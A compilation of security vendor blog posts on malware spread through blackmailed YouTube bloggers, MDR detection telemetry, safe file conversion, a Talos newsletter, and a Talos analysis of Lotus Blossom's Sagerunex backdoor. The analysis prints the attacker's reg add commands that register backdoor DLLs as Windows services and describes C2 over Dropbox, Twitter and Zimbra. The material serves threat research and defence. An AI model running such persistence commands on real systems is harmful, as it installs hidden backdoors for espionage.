Over the past six months, Windows Packet Divert drivers for intercepting and modifying network traffic on Windows systems have become popular in Russia. From August to January 2024, we noted that detections of these drivers almost doubled. The main reason? These drivers are being used in tools designed to bypass restrictions for accessing foreign resources.

This surge in popularity hasn’t gone unnoticed by cybercriminals. They’re actively distributing malware disguised as bypassing tools — and they’re doing it by blackmailing bloggers. So, every time you watch a video titled something like “How to bypass restrictions…”, be especially cautious — even the most reputable content creators might unknowingly be spreading stealers, miners, and other malware.

How cybercriminals exploit unsuspected users — and where bloggers fit into the picture — is what we’ll explore in this article.

Hackers disguised as honest developers

There are plenty of software solutions designed to bypass restricted access to foreign platforms, but they all have one thing in common — they’re created by small-time developers. Such programs spread organically: an enthusiast writes some code, shares it with friends, makes a video about it, and voilà — yesterday’s unknown programmer becomes a “people’s hero”. His GitHub repository is starred tens of thousands of times, and people thank him for restoring access to their favorite online resources. We recently wrote about one such case where cybercriminals boosted GitHub repositories containing malware.

There may be dozens or even hundreds of such enthusiasts — but who are they, and can they be trusted? These are key questions both current and potential users of these programs should be asking. A major red flag is when these developers recommend disabling antivirus protection. Disabling protection to voluntarily give a potential hacker access to your device? That’s a risky move.

Of course, behind the mask of a people’s hero might be a hacker looking for profit. An unprotected device is vulnerable to malware families like NJRat, XWorm, Phemedrone, and DCRat, which have been commonly spread alongside such bypassing software.

Where do bloggers fit in?

We’ve identified an active miner distribution campaign that has claimed at least two thousand victims in Russia. One of the infection sources was a YouTube channel with 60,000 subscribers. The blogger uploaded several videos on bypassing restrictions, with a link to a malicious archive in the description. These videos accumulated over 400,000 views in total. Later, the channel owner deleted the link, leaving this note: “Download the file here: (program does not work)”. Originally, the link led to the fraudulent site gitrok[.]com, where the infected archive was hosted. According to the site’s counter, at the time of our study the bypassing tool had been downloaded at least 40,000 times.

Don’t rush to put all the blame on the bloggers — in this case, they were simply following the orders of cybercriminals, unaware of what was really going on. Here’s how it works. First, the criminals file a complaint against a video about such a restriction-bypassing tool, pretending to be the software’s developers. Then they contact the video creator and persuade them to upload a new video, this time containing a link to their malicious website — claiming that this is now the only official download page. Of course, the bloggers have no idea the site is distributing malware — specifically, an archive containing a miner. And for those who’ve already uploaded three or more videos on the topic, refusal is not an option. The hackers threaten to file multiple complaints, and if there are three or more, the channel would be deleted.

In addition, the criminals spread their malware and installation guides through other Telegram and YouTube channels. Most of these have been deleted — but there’s nothing to stop them from creating new ones.

What about the miner?

The malware in question was a sample of SilentCryptoMiner, which we covered in October 2024. It’s a stealthy miner based on XMRig, another open-source mining tool. SilentCryptoMiner supports mining of multiple popular cryptocurrencies, including ETH, ETC, XMR, RTM, and others. The malware stops mining upon detecting certain processes, the list of which the criminals can provide remotely to evade detection. That makes it nearly impossible to detect without reliable protection.

For more about the malicious archive and how it persists in the system, check our post on Securelist.

How to protect yourself from miners

• Ensure that all personal devices have trusted protection to safeguard against miners and other malware.
• Avoid downloading programs from obscure or little-known sources. Stick to official platforms, but remember — malware can creep into them too.
• Keep in mind that even the most reputable bloggers can unknowingly spread malware, including miners and stealers.

Here are some relevant articles you can read to learn more about miners and their dangers:

Mario Forever, malware too: a free game with a miner and Trojans inside

XMRig Miner as a New Year’s gift

Prices down, miners up

Kaspersky official blog – ​Read More

To effectively counter cyberthreats that circumvent basic security measures, a managed detection and response (MDR) service must ensure the right data collection tools are in place in the protected organization from the start. In addition, the service team and the client team should regularly discuss how to improve telemetry collection, and what other data should be collected in order to stay ahead of evolving attacker tactics. Our experts not only advise clients on proper data collection, but also closely monitor the changing threat landscape to continuously refine the process. Our latest MDR service report details incidents in client infrastructures and the tactics attackers have used. A dedicated section of the report covers the most frequently triggered detection rules in 2024, and what’s required for them to function effectively.

Dumping registry hives

Among the suspicious operations frequently detected in high-severity incidents, the most common by far is the extraction of security-critical data from the system registry (dumping of sensitive registry hives). This activity was observed in 27% of high-severity incidents.

To detect such extraction, the MDR provider must have telemetry from an EDR system installed on all computers and servers in the protected organization. If there’s an endpoint protection system (EPP) that can detect suspicious (not necessarily malicious) activity, this can also serve as a source of the necessary data. An event that most definitely should be logged is registry access.

Malicious code in memory

Many attacks occur in such a way that malicious files are never stored on the hard drive. However, an endpoint protection system can detect malicious code in the memory of a system process or another memory segment. This occurred in 17% of high-severity incidents, and such events from the EPP must be instantly visible to the MDR service.

Suspicious services

The creation and execution of Windows services containing suspicious arbitrary code is a strong indicator of an unfolding cyberattack. This was also detected in nearly 17% of high-severity incidents. To detect this activity, telemetry must include OS system events, process launch information, and the complete contents of all startup lists.

Access to a malicious host

Though seemingly simple, this event appeared in 12% of high-severity incidents, and requires an up-to-date IP reputation database for detection. In a company’s infrastructure, access attempts can be tracked in multiple ways: EPP detection, network-level monitoring, and DNS/HTTP request analysis. The MDR provider can also use threat intelligence databases to enrich the client’s telemetry.

Memory fragment dumps

To escalate an attack within a victim’s network after the initial compromise, attackers often try to obtain credentials on an infected machine. If they get lucky, these may be network administrator credentials, allowing them to quickly take over servers. A classic technique for achieving this is extracting and saving memory fragments related to the LSASS (Local Security Authority Subsystem Service). In 2024, we detected this technique in nearly 12% of high-severity incidents.

Attempts to capture LSASS memory can be detected in multiple ways: using certain EPP and EDR rules, analyzing command-line parameters when launching applications, scripts and processes, and monitoring access to LSASS.

Executing a low-reputation object

Although a file, script, or document may not be definitively malicious, if it was previously observed in suspicious activity, MDR specialists must check whether a cyberattack is underway. This requires telemetry that logs processes launching suspicious files. And, of course, threat intelligence is needed to flag the file’s bad reputation. Execution of low-reputation objects was observed in 10% of high-severity incidents.

Adding privileged users

Beyond stealing administrator accounts, attackers often create their own accounts and then elevate their privileges. In 9% of high-severity incidents, an account was added to a privileged corporate domain group. To detect this, OS event collection must capture all account modifications.

Remote process execution

In over 5% of incidents, there was a process involved that was launched by a remote user. To monitor such events, computers must log process launch events and the loading of executable file sections into memory.

Malicious address in event parameters

In any event-parameters — but most commonly in the command line of the running process — a known malicious URL may appear. This was observed in nearly 5% of high-severity incidents, making it crucial to always include detailed parameters of logged events, including the full command line, in the telemetry. For MDR providers, such detection is only possible with access to a large URL-reputation database (which we, of course, have).

Telemetry sources

Above, we’ve highlighted the most critical events that help an MDR team detect and prevent serious incidents. The full report covers additional events and a deeper analysis of attacker tactics. The list above makes it clear what types of data must be transmitted to an MDR service in real time for it to work effectively. First and foremost, this includes:

• Telemetry from endpoint protection solutions (EPP) or EDR agents. In today’s organizations, traditional “antivirus” and detection and response tools are often integrated into a single product. This provides key telemetry from computers and servers, so its presence is essential on all machines, along with the configuration of detailed event logging in collaboration with the MDR team.
• OS events. Properly configured Windows logs provide critical information about account manipulations, process launches and terminations, and more. On Linux systems, the same role is played by Audit Daemon (aka auditd). Special attention must be given to configuring logging on all of the organization’s servers. Detailed recommendations for settings for Windows can be found in our knowledge base. The Sysmon tool from the Microsoft Sysinternals suite enhances the effectiveness of Windows logs.
• Events from network devices. It’s critical to configure detailed logging on network devices — primarily firewalls and web filters, but also routers, proxies, and DNS servers if used in the company.
• Cloud environment logs. Attackers frequently compromise cloud infrastructure and SaaS tools, where the previously mentioned logs are typically not available. Therefore, it’s essential to set up comprehensive security-focused logging using cloud-native tools, such as AWS CloudTrail.

Kaspersky official blog – ​Read More

You almost certainly know the situation when a friend or colleague sends you files in a format you can’t open. For example, you asked for photos, expecting JPEGs or PNGs, but instead they arrive in HEIC format. What do most people do in this case? That’s right, they look for a free online file-converter.

If you’re a long-time reader of our Kaspersky Daily blog, you probably already know that the most popular method of doing most anything is hardly ever the safest. File conversion is no different. Let’s figure out together what threats are lurking inside free online-converters, and find out how to change file format safely.

Why is this important? Because converting a file is not simply a matter of changing its extension — otherwise you could just rename the file from, say, EPUB to MP3. Instead, the converter program must read the file, understand what it contains, convert the data and re-save it in a different format — and each of these stages poses its own threats.

Personal data leakage, malware, and other threats

The first risk that springs to mind is personal data leakage. Even if you’re a “who on earth needs my data?” kind of person, you should still take care: your vacation snaps may be of no use to anyone, but confidential work documents are a different kettle of fish. When you upload a file to an online converter, you can never be sure that the site won’t save a copy of your file for its own purposes. Uploaded data can easily end up in the hands of scammers, and even be used to launch an attack on your company. And if you get fingered as the intruders’ entry point into the corporate network, your infosec team will hardly be thanking you.

If you think this threat applies solely to text or spreadsheet documents, and that a photo of some accounting statement can be safely uploaded and converted to PDF, think again. Optical character recognition (OCR) was invented last century, and now, with AI, even mobile Trojans have learned to extract data of interest to attackers from photos in your smartphone gallery.

Another common risk is malware infection. Some dubious converter sites may modify your files or add malicious code to the converted file — and without reliable protection you won’t know about it until it’s too late. The converted files may contain scripts, Trojans, macros, and other nasty stuff we’ve covered in detail many times.

Converter sites may also be phishing, so services asking you to register, enter a load of personal data, and buy a subscription just to convert a file from, say, PDF to DOC, should be eyed with suspicion. If you still plan to use an online converter, look for one that doesn’t require registration, and never give it your payment details.

How to convert files locally

The safest way is to convert files locally; that is, on your own device without using third-party sites. This way, the data is guaranteed to remain confidential — at least until you connect to the internet. You can change a file’s format using either system tools or popular programs.

For text and spreadsheet files, as well as presentations, Microsoft Office can help. It can read many file formats using the File → Open or File → Import commands (depending on the version of Office and the operating system), and save them in different formats using the File → Save as → Save as type (or File format) or File → Export commands. The list of available formats is long: from PDF and HTML to the OpenDocument standard.

If you don’t have access to Microsoft products, you can use the free alternatives LibreOffice and OpenOffice, which also support various text and table file formats. On Windows, text documents can also be converted in a built-in WordPad editor, although it reads far fewer file types.

For macOS users, Apple’s office applications (Pages, Numbers, Keynote) recognize and save documents in many different formats.

As for graphics files, things are even simpler. Built-in operating-system tools can help convert images from PNG to JPEG. On Windows, just use this command in Paint: File → Save as. macOS users don’t even need to open any programs — just right-click the image in Finder and select Quick Actions → Convert Image. The window that opens gives you a choice of format (PNG, JPEG, HEIF) and converted image size.

If the above conversion options aren’t enough — for example, you’re handling audio/video files or specific file formats — look for offline tools with a solid reputation as free and open-source software (FOSS).

For video (and many audio) formats, check out Handbrake (Windows, macOS, Linux) and Shutter Encoder (Windows, macOS, Linux); for audio, try Audacity, and for images, ImageMagick (Windows, macOS, Linux).

Most multimedia converters simply add a graphical interface to FFmpeg, perhaps the top tool for converting multimedia formats. Its only drawback (which for some is a plus) is that it only works from the command line.

If you’re fine with the command line, FFmpeg is the obvious choice (but, being fine, you’ve probably got it installed already). Another great choice for command line fans is Pandoc — a versatile converter of text and markup formats. Incidentally, under Extras on the Pandoc website, you can find many third-party utilities for adding a graphical interface to this converter, or embedding it in other editors, services, or even operating systems.

All of the above converters are FOSS (free and open-source software), and support at least the most popular operating systems: Windows, macOS, Linux.

When choosing other offline converters, make sure that the conversion really does take place locally — many tools simply provide an interface to online converters and still send your source files to a server. This is very easy to check by disconnecting from the internet before converting. If the tool doesn’t work, it’s not an offline converter.

How to convert files online as safely as possible

Sometimes there’s no avoiding online converters — for example, you were sent a file in some highly exotic or outdated format. The next section looks at how to minimize threats when converting files online.

Alas, it’s impossible to guarantee confidentiality when using an online converter. Its creators can write whatever they want in the site’s policies, but you’ll never know what actually happens to your uploaded data. Therefore, the golden rule is: never convert sensitive information online.

If you have a Google account (and who doesn’t?), you can upload the file you want to convert to Google Drive (most office formats are accepted), right-click, and open it in Google Docs/Sheets/Slides, then download it in a different format. Among the pluses, this method also works on mobile devices — although in this case it’s more convenient to open the file in the relevant Google editing tool.

Another fairly safe way to convert either text or graphics files is Adobe’s online converter. You can even use it for free on a smartphone — but there’s a catch: all uploaded data gets stored on Adobe’s servers, making this method unsuitable for confidential files.

Follow these rules to ensure maximum safety when converting files online:

• Use reputable online converters.
• Open the converter site in a new browser window in Incognito mode; this will reduce the amount of information collected about you — but not down to zero.
• Use a reliable VPN to hide your real IP address from the converter site.
• Review the online converter’s privacy policy to understand how your data will be handled. Make sure the service does not collect, store, or transfer information without your consent — or at least claims not to.
• Check that the files for conversion do not contain confidential information.
• Scan the converted files with an antivirus. Be very wary if the converter site wants you to download the result in an archive — especially a password-protected one, since this is the most common way to conceal a virus from security software. If you don’t have any protection software on your device (heaven forbid), you can scan the downloaded file using our online file checker.
• Avoid unverified sites that require registration and payment details.

Unzip this

Lastly, a small life-hack that few people know about. Sometimes you don’t need to convert a file to another format at all, but just extract information from it; for example — pull images out of a text document or presentation in their original format. Doing this even with native editors is usually time-consuming and inconvenient — you have to export the images one by one, and the editors might change their size or compress them, deteriorating the picture quality.

But there’s a way round this. The secret is that files of many formats are nothing more than a compressed folder with subfolders that store “pieces of the puzzle”: text, images, embedded videos, and the like. And it’s all zipped. That means that almost all office-suite files are ZIPs with the extension changed to DOCX, PPTX, PAGES, etc.

To extract all the contents from this “archive”, you simply need to rename the file, changing its extension to ZIP, and then unzip it. The result will be a folder with subfolders in which all the “ingredients” of the original document are neatly laid out.

So, if you come across an unknown file format, first of all scan it for viruses with a reliable security solution, then make a copy of it, change the extension to ZIP (in macOS, if the file extension is hidden, you may need to press ⌘+I to change it), and try to unzip the file — in many cases this will work. Next, have a rummage around in the resulting folder — you’ll find all sorts of goodies!

Kaspersky official blog – ​Read More

Welcome to this week’s edition of the Threat Source newsletter. 

Hello again my friends! Geez, it’s been a year am I right? Lemons its February you say?! Oof.  

Imposter syndrome. You’ve heard the term I’m sure, but what is it? Basically: imposter syndrome is the persistent feeling of self-doubt and fear of being exposed as a fraud despite clear evidence of competence and success. In cybersecurity, and in especially in Talos, you will find imposter syndrome in abundance.

In Talos you’re in rooms of incredibly bright and smart people. They are paragons of what it is to be hackers, and you cannot help but often admire the amazing quality of their work. It is truly an amazing team that does important work to help save the world from the bad guys.  

The downside? You’re in a room of bright and smart people. Some can reverse malware binaries while juggling chainsaws. Some are polyglots who can at length tell you the linguistic nuances of Mesopotamian verbs and loanwords and have eidetic memory of every ransomware cartel ever. I personally know one is an amazing, accredited musician and actually hacked a prison to open its jail cells on a pentest. 

How do you not compare yourself to the talents, skills, and achievements of wonderfully smart and talented people? It’s tough not to. Comparison is truly the thief of joy.  

The truth is – in cybersecurity and in places like Talos and elsewhere, you will be constantly assailing yourself with self-doubt of achievement and belonging. The anxiety, stress, and burnout from imposter syndrome are a real thig.  

So what do we do? First, look at your achievements. You are where you are because others saw value in your work. Second, challenge those negative self-thoughts. Easier said than done, I know, but hear me out. Use mentors and peer group support to help challenge those negative self-thoughts.

And lastly, be kind to yourself. Cybersecurity is a hard gig. It’s a gigantic amount of technical and non-technical information and we all feel the pressure to absorb, understand, and master it and all its nuances. That’s not possible of course, but we cyber folks are wired differently. If you can walk away with 1% more information than you had yesterday, that’s a win. Take it. Just be kind to yourself, ok? 

I want to take a moment to address a specific audience of readers. All the U.S.  federal workers who have been affected by reduction in force (RIFs), my heart goes out to you. This is an unearned hardship. I wish I had a magic wand to wave to alleviate the stress and trauma of a sudden event like this. I know it’s truly awful. If I can offer any guidance or mentorship for private sector cybersecurity, reach out. I may not have all the answers, but I will do what I can. Stay strong.  

The one big thing

Boy howdy is this a big one – scams! Look, the average person isn’t going to get smoked by Salt/Volt Typhoon, or wrestle with a financial threat actor like a ransomware cartel. But you absolutely have bought and sold things online.  We break down seller abuse – that is, ways to trick sellers into be defrauded out of money. We always picture scams as the seller doing the defrauding, but the reverse is just as true.  

Why do I care?

You want to keep money in your pocket, and not be the victim of a scam. They adversaries here know the systems they are manipulating quite well here and have fine tuned the art of fraud. It’s important to understand the seller experience as much as the buyer experience in order understand these kinds of frauds and thefts.

So now what?

Understand the threat landscape for seller/buyer fraud, and hopefully this work can help keep money in your pocket and not a victim of theft. Pay attention to URL’s you’re asked to click, and clever re-directs to scamming websites. Now you know. And as G.I. Joe said – knowing is half the battle.  

Top security headlines of the week

Sensitive financial and health data belonging to millions of veterans and stored on a benefits website is at risk of being stolen or otherwise compromised, according to a federal employee tasked with cybersecurity who was recently fired as part of massive government-wide cuts. (AP News) 

Attackers are wielding a novel Linux backdoor against the education and public sectors in the US and Asia that demonstrates particularly stealthy ways to avoid both detection and as well as deletion from a system. (Dark Reading) 

Hackers claim to have published a trove of sensitive data belonging to IVF patients after a cyberattack on Genea, one of Australia’s largest fertility providers. (Tech Crunch) 

Can’t get enough Talos?

The Beers with Talos B-team comes in swinging hard on cyber security careers. I get a little spicy, and you want to hear it. Now that I know we bleep certain words, I anticipate a 50% uptake in more spicy content. You can all blame Hazel for this.

New research: Lotus Blossom espionage group targets multiple industries with different versions of Sagerunex and hacking tools

A blueprint for protecting major events – Yuri Kramarz joins Talos Takes to discuss his experience in cybersecurity and threat hunting for some of the world’s biggest sporting events.

Upcoming events where you can find Talos

RSA (April 28-May 1, 2025)  San Francisco, CA  

CTA TIPS 2025 (May 14-15, 2025) Arlington, VA 

Cisco Live U.S. (June 8 – 12, 2025) San Diego, CA 

Most prevalent malware files from Talos over the past week

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca 

MD5: 71fea034b422e4a17ebb06022532fdde 

VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details 

Typical Filename: VID001.exe 

Claimed Product: N/A 

Detection Name: Coinminer:MBT.26mw.in14.Talos 

SHA 256:9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  

MD5: 2915b3f8b703eb744fc54c81f4a9c67f  

VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  

Typical Filename: VID001.exe  

Detection Name: Simple_Custom_Detection

Cisco Talos Blog – ​Read More

• Cisco Talos discovered multiple cyber espionage campaigns that target government, manufacturing, telecommunications and media, delivering Sagerunex and other hacking tools for post-compromise activities. 
• Talos attributes these attacks to the threat actor known as Lotus Blossom. Lotus Blossom has actively conducted cyber espionage operations since at least 2012 and continues to operate today. 
• Based on our examination of the tactics, techniques, and procedures (TTPs) utilized in these campaigns, alongside the deployment of Sagerunex, a backdoor family used exclusively by Lotus Blossom, we attribute these campaigns to the Lotus Blossom group with high confidence.  
• We also observed Lotus Blossom gain persistence using specific commands to install their Sagerunex backdoor within the system registry and configuring it to run as a service on infected endpoints.  
• Lotus Blossom has also developed new variants of Sagerunex that not only use traditional command and control (C2) servers but also use legitimate, third-party cloud services such as Dropbox, Twitter, and the Zimbra open-source webmail as C2 tunnels. 

A multi-campaign, multi-variant backdoor operation  

Talos assesses with high confidence that Lotus Blossom (also referred to as Spring Dragon, Billbug, Thrip) threat actors are responsible for these campaigns. The group was previously publicly disclosed as an active espionage group operating since 2012. Our assessment is based on the TTPs, backdoors, and victim profiles associated with each activity. Our observations indicate that Lotus Blossom has been using the Sagerunex backdoor since at least 2016 and is increasingly employing long-term persistence command shells and developing new variants of the Sagerunex malware suite. The operation appears to have achieved significant success, targeting organizations in sectors such as government, manufacturing, telecommunications and media in areas including the Philippines, Vietnam, Hong Kong and Taiwan.  

 

Our investigation uncovered two new variants of the Sagerunex backdoor, which were detected during attacks on telecommunications and media companies, as well as many Sagerunex variants persistent in the government and manufacturing industries. These new variants no longer rely on the original Virtual Private Server (VPS) for their C2 servers. Instead, they use third-party cloud services such as Dropbox, Twitter, and the Zimbra open-source webmail service as C2 tunnels to evade detection. In our malware analysis section, we will delve into the technical specifics of each Sagerunex backdoor variant and illustrate their configurations. Some configurations reveal the possible original file paths of the malware, providing insights into the threat actor’s host paths. 

  

We also compiled a timeline for the evolution of Sagerunex by analyzing data from the campaigns we observed, third-party reports, malware compilation timestamps, and the timestamps of victim uploads on the C2 service: 

 

Attributing the attacks to Lotus Blossom 

Talos has identified strong evidence to attribute these campaigns to the Lotus Blossom group, primarily due to the presence of the Sagerunex backdoor within these operations. Sagerunex is a remote access tool (RAT) assessed to be an evolution of an older Billbug tool known as Evora. Sagerunex is designed to be dynamic link library (DLL) injected into an infected endpoint and executed directly in memory.  

 

We also observed the Sagerunex backdoor employ various network connection strategies to ensure it remains under the actor’s control. Despite the development of three distinct variants, the foundational structures and core functionalities of the backdoor remain consistent. These consistent elements enable us to confidently categorize all identified variant backdoors as part of the Sagerunex family.  

 

Moreover, the consistent patterns in victimology and the TTPs identified across these campaigns strongly support our attribution to the Lotus Blossom espionage group. This consistency, seen in the selection of targets and the methods employed, aligns with the known operational characteristics of Lotus Blossom, providing compelling evidence that these campaigns are orchestrated by this specific threat actor. 

Lotus Blossom’s latest attack chain  

We conducted research into the main elements of the attack including the specific functions of each malware strain and how Lotus Blossom managed to evade detection  for several months. We also observed the threat actor leverage a number of hacking and open-source tools to achieve their objectives. 

• Cookie stealer tool: Pyinstaller bundle of a Chrome cookie stealer which is an open-source tool from github. Lotus Blossom used it to harvest Chrome browser credentials.   

 

• Venom proxy tool: A proxy tool developed for penetration testers using Go language. The threat actor customized this Venom tool and hardcoded the destination IP address in each activity. 

 

• Adjust privilege tool: Enabled the threat actor to retrieve another process token and adjust privilege for the launch process.  

 

• Archiving tool: A customized compressed and encrypted tool which enabled the attacker to steal each file or entire folder to the specific file path with protection. For example, the tool archived Chrome and Firefox browser cookies folders. 

 

• Port relay tool: The threat actor named this tool “mtrain V1.01” which is a modified proxy relay tool from HTran. The tool allowed the threat actor to relay the connection from the victim machine to the internet. 

 

• RAR tool: An archive manager that the threat actor used to archive or zip files. 

Extended persistence   

Lotus Blossom frequently utilizes the Impacket tool to execute remote processes and commands within the victim’s environment, consistent with known Lotus Blossom TTPs. Once they gain access to a target, their operations typically unfold over multiple stages. Each stage is carefully executed, indicating a well-planned strategy aimed at achieving long-term objectives. This multi-stage approach enables them to maintain a presence in the network for extended periods, often going undetected for several months. Below is an example of overall attack chain visualization.  

 

In the compromised environment, the threat actor executes various commands such as “net,” “tasklist,” “quser,” “ipconfig,” “netstat,” and “dir.” These commands are used to gather detailed information about user accounts, directory structures, process activities, and network configurations. Following the initial reconnaissance, the actor assesses whether the compromised machine can connect to the internet. If internet access is restricted, then the actor has two strategies: using the target’s proxy settings to establish a connection or using the Venom proxy tool to link the isolated machines to internet-accessible systems. Additionally, we have noticed that the actor frequently deposits backdoor and hacking tools in the “publicpictures” subfolder. This location is publicly accessible to all users and, unlike system folders, is not hidden or protected, making it a strategic choice for evasion and continued access. 

 

Besides running commands for discovery and lateral movement, we also observed Lotus Blossom use specific commands to install their notorious Sagerunex backdoor within the system registry, configuring it to run as a service. Presented below are the command lines the actor used to install the backdoor as a service. 

reg add HKLMSYSTEMCurrentControlSetServicestapisrvParameters /v ServiceDll /t REG_EXPAND_SZ /d c:windowstapisrv.dll /f  reg add HKLMSYSTEMCurrentControlSetServicestapisrv /v Start /t REG_DWORD /d 2 /f

reg add HKLMSYSTEMCurrentControlSetServicesswprvParameters /v ServiceDll /t REG_EXPAND_SZ /d c:windowsswprv.dll /f  reg add HKLMSYSTEMCurrentControlSetServicesswprvParameters /v ServiceDll /t REG_EXPAND_SZ /d c:windowssystem32swprv.dll /f

reg add HKLMSYSTEMCurrentControlSetServicesappmgmtParameters /v ServiceDll /t REG_EXPAND_SZ /d c:windowsswprv.dll /f  reg add HKLMSYSTEMCurrentControlSetServicesappmgmt /v Start /t REG_DWORD /d 2 /f

reg add HKLMSYSTEMCurrentControlSetServicesappmgmtParameters /v ServiceDll /t REG_EXPAND_SZ /d c:windowssystem32appmgmts.dll /f

 

The actor used the following commands to verify that the backdoor can successfully run as a service.  

reg query HKLMSYSTEMCurrentControlSetServicesswprvParameters 

reg query HKLMSYSTEMCurrentControlSetServicestapisrvParameters 

reg query HKLMSYSTEMCurrentControlSetServicesappmgmtParameters 

 

Sagerunex malware analysis 

In this section, we provide in-depth technical analysis of the multiple variants of the Sagerunex backdoor. Our exploration will begin with a detailed examination of a particular Sagerunex backdoor variant that exhibits a high degree of code similarity and workflow resemblance to those described in other vendors’ blog posts. This analysis will help establish connections and highlight the shared characteristics observed across different Sagerunex variants.  

 

Next, we will shift our focus to another intriguing variant of the Sagerunex backdoor, which utilizes Dropbox as its C2 server. This unconventional choice of a third-party cloud service illustrates the threat actor’s adaptability and efforts to evade detection. Additionally, we have identified another variant of the Sagerunex backdoor that leverages the Zimbra open-source webmail service for its C2 operations. This finding further underscores the diverse strategies Lotus Blossom employs to maintain control and persist within compromised environments. 

 

We examined the loader code similarity to identify numerous variants of the Sagerunex backdoor. By analyzing the loader and the behavior of the Sagerunex backdoor, we can classify the malware into the Sagerunex family. Despite the loader’s compact size and primary function of injecting the Sagerunex backdoor into memory, we have identified two distinct loader patterns. The first pattern involves the decryption algorithm: the loader embeds and encrypts the Sagerunex backdoor, utilizing a customized decryption process to extract it. The second pattern is the “servicemain” function, where the loader verifies its environment, ensuring it can only be executed as a service.  

 

Furthermore, we also observed the actor employ VMProtect, a software protection tool, to obfuscate Sagerunex code and evade detection by antivirus products. These sophisticated techniques are used to maintain the persistence of Sagerunex backdoor variants. 

 

Sagerunex malware similarity 

During its initial execution, Sagerunex conducts several checks before sending a beacon to its C2 server. These verification functions are present across all Sagerunex variants. The initial check involves searching for a debug log file in the temp folder. Regardless of whether this debug log file is present, all Sagerunex variants will proceed with execution. If the debug log is found, the backdoors will encrypt the debug strings along with a timestamp and store them in the log file. Below is a screenshot displaying the debug file names for all Sagerunex variants. From left to right, the versions include: the “Beta” version, featuring clear debug strings within its code flow; the original version, previously discussed in another blog post and the code flow is same as Beta version; the Dropbox and Twitter versions, which utilize these third-party cloud services as C2 channels; and finally, the Zimbra version, which employs the Zimbra webmail service for C2 purposes. 

 

The second check involves verifying the existence of the backdoor configuration file within a specific directory and under a designated filename. Below, we provide examples of different versions of the Sagerunex configuration file paths and filenames uncovered during our research. We suspect there may be additional directories that remain undiscovered. These are likewise ordered in the same manner as the preceeding paragraph.  

 

Subsequently, the Sagerunex backdoor examines the system time to decide whether to execute its main function immediately or delay its execution. Each Sagerunex variant possesses its own time-check logic. For example, one variant checks if it operates during working hours (e.g. 10:00 am to 7:00 pm), while another ensures that the system hours do not exceed the system minutes. Despite these slight variations in check strategies among the Sagerunex backdoors, they all utilize the same pause API, “WaitForSingleObject,” and uniformly wait for 300,000 milliseconds before proceeding again with time-check logic. 

 

A final shared feature among all Sagerunex variants is their approach to proxy configuration, which enables the backdoor to successfully connect to the C2 server. While the malware includes several proxy-related functions, not all variants utilize every available option. Some rely solely on web proxy “autodiscovery” for accessing proxy services. Additionally, we identified hardcoded proxy servers, along with proxy usernames and passwords, within the Sagerunex configuration files. This discovery strongly supports our assessment that Lotus Blossom’s activities are intended for espionage purposes.  

Beta version of Sagerunex 

The Beta version of Sagerunex closely resembles the Sagerunex backdoor discussed previously in this post. However, this Beta version includes additional debug strings featuring more complete sentences, which is why we have called it the Beta version of Sagerunex. For example, as shown in the screenshot below, while typical Sagerunex debug strings often use “0x00” as a prefix followed by error or behavior shortcut strings, the Beta version offers more detailed information, such as “Online Fail! Wait for %d minsrn.” Furthermore, this Beta version also provides us with a clearer understanding of Sagerunex workflow. 

Fig. The left side is the Beta version of Sagerunex and the right side is typical Sagerunex. 

 

Once all the checks are bypassed, the Beta version of Sagerunex gathers information from the target host, including the hostname, MAC address, and IP address. It also queries the public IP address using “api.ipaddress[.]com.” This collected information is then encrypted and sent back to the C2 server. Upon receiving the encrypted data, Sagerunex decrypts it, successfully bringing the backdoor online and enabling the threat actor to control the target. Below are the debug strings indicating successful online status and the backdoor command functions. 

Fig. The left side is the online debug strings, and the right side is backdoor command functions.  

The Beta version of Sagerunex backdoor overall infection chain is visualized below. 

Dropbox & Twitter version of Sagerunex 

Talos also discovered another variant of Sagerunex backdoor that uses Dropbox and Twitter API as C2 services. After bypassing the initial checking steps, this backdoor variant retrieves the necessary Dropbox or Twitter tokens to successfully bring the backdoor online. Once the backdoor sends a beacon message and receives a response ID, it evaluates the ID number to determine subsequent actions. If the ID is less than 16, the function will return, prompting the backdoor to send another beacon message and wait for a new ID. If the ID is between 16 and 32, the backdoor proceeds to collect host information and execute paired backdoor command functions. After gathering the information and executing the commands, the backdoor encrypts and archives all collected data, then transmits it back to Dropbox or Twitter. When the ID received equals 39, the backdoor retrieves data from Dropbox files or Twitter status updates to confirm the status of the backdoor service. Below are the screenshots of Dropbox and Twitter connection testing function and this variant’s command functions. 

Fig. The left side is the online debug strings, and the right side is backdoor command functions. 

 

Additionally, our reverse engineering of this version of the Sagerunex backdoor revealed one intriguing finding. We discovered that the configuration file for this version not only includes Dropbox tokens and Twitter tokens but also reveals its original file path, which we believe may originate from the actor’s machine. Below, we provide a list of all the file paths we identified, along with a screenshot of the configuration file. 

• C:UsersaaDesktopdpst.dll 
• C:Users3DesktopDT-1-64-Gmsiscsii.dll 
• C:UsersbalabalaDesktopswprve64.dll 
• C:Userstest04Desktopadtsvc32.dll 
• C:UsersUSERDocumentsdtj32dj32.dll 

 

Moreover, our observations of the timestamps on Dropbox files and Twitter content indicate that this version of the backdoor was predominantly active between 2018 and 2022, and we assess this version of backdoor might still be active now. This timeframe suggests a consistent pattern of use over several years, highlighting the longevity and persistence of this threat in the wild. Below is an example where we extract the file details from one of the Dropbox accounts. 

 

The Dropbox & Twitter version of Sagerunex backdoor infection chain is visualized below. 

Zimbra webmail version of Sagerunex 

The final variant of the Sagerunex backdoor Talos discovered employs the Zimbra API to connect to a legitimate Zimbra mail service, using it as a C2 channel to exfiltrate victim information. Like other versions, this Sagerunex variant performs all the necessary checks before establishing its initial beacon connection. It uses the Zimbra webmail URL, along with a username and password, to login and obtain an authentication token. Upon successfully acquiring this token, the backdoor synchronizes the account’s folders and documents and utilizes the search function API to verify the connection’s functionality. Once the connection and synchronization processes are complete, the backdoor gathers host information, encrypts the information, and saves the data as “mail_report.rar”. The rar file is being attached to a draft email the user’s email account draft folder. With these steps finalized, the beacon connection is successfully established. 

 

